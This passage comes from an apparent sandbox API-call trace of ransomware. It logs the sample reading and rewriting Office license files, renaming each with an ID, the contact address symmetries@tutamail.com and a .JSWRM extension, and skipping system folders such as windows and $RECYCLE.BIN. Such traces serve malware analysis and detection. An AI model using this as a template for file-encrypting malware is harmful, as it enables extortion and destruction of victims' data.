lpUsedDefaultChar=0x0) returned 33 [0102.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0102.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0102.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0102.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0102.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0102.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.953] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10667) returned 1 [0102.953] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29a0) returned 0x24c1d0 [0102.953] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29a0, lpOverlapped=0x0) returned 1 [0102.955] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.955] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29a0, lpOverlapped=0x0) returned 1 [0102.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.955] CloseHandle (hObject=0x45c) returned 1 [0102.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0102.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0102.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0102.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0102.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0102.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0102.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.956] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0102.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0102.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0102.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.957] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3eaba33, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3eaba33, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3f6a648, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x564e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", cAlternateFileName="HO3D7E~1.XRM")) returned 1 [0102.957] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", lpString2=".") returned 1 [0102.957] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", lpString2="..") returned 1 [0102.957] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", lpString2="...") returned 1 [0102.957] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", lpString2="windows") returned -1 [0102.957] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.957] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.957] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0102.957] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.957] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.957] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0102.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0102.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0102.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0102.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0102.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0102.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0102.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0102.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0102.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0102.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0102.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.958] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22094) returned 1 [0102.958] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5640) returned 0x24c1d0 [0102.958] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5640, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5640, lpOverlapped=0x0) returned 1 [0102.968] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.968] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5640, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5640, lpOverlapped=0x0) returned 1 [0102.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.969] CloseHandle (hObject=0x45c) returned 1 [0102.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0102.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0102.969] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0102.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0102.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0102.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0102.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.969] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0102.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0102.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0102.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.973] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3e5f5e0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3e5f5e0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3f1e1f4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d65, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", cAlternateFileName="HO4CF9~1.XRM")) returned 1 [0102.973] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.973] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.973] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.973] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.973] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.973] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.973] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0102.973] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.973] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.973] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0102.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0102.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0102.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0102.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0102.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0102.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0102.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0102.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0102.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0102.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0102.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.974] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11621) returned 1 [0102.974] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0102.974] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0102.977] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.977] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0102.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.977] CloseHandle (hObject=0x45c) returned 1 [0102.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0102.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0102.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0102.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0102.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0102.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0102.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.978] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0102.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0102.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0102.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.980] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe40756e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe40756e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe415a524, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dfe, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", cAlternateFileName="HOFD0F~1.XRM")) returned 1 [0102.980] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", lpString2=".") returned 1 [0102.980] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", lpString2="..") returned 1 [0102.980] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", lpString2="...") returned 1 [0102.980] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", lpString2="windows") returned -1 [0102.980] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0102.980] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0102.980] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0102.980] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.980] lstrcmpiW 